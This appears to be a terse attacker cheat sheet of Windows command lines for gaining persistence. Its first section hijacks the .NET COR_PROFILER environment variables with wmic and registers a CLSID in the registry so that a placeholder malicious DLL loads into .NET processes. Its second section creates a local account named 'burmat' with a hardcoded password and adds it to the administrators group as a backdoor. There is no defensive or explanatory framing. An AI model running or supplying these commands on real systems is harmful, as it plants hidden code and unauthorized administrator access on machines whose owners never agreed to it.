COR Profiler Variable Hijack
# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete
# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"
# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"
# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F
Local Administrator Account Creation
net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add
net localgroup administrators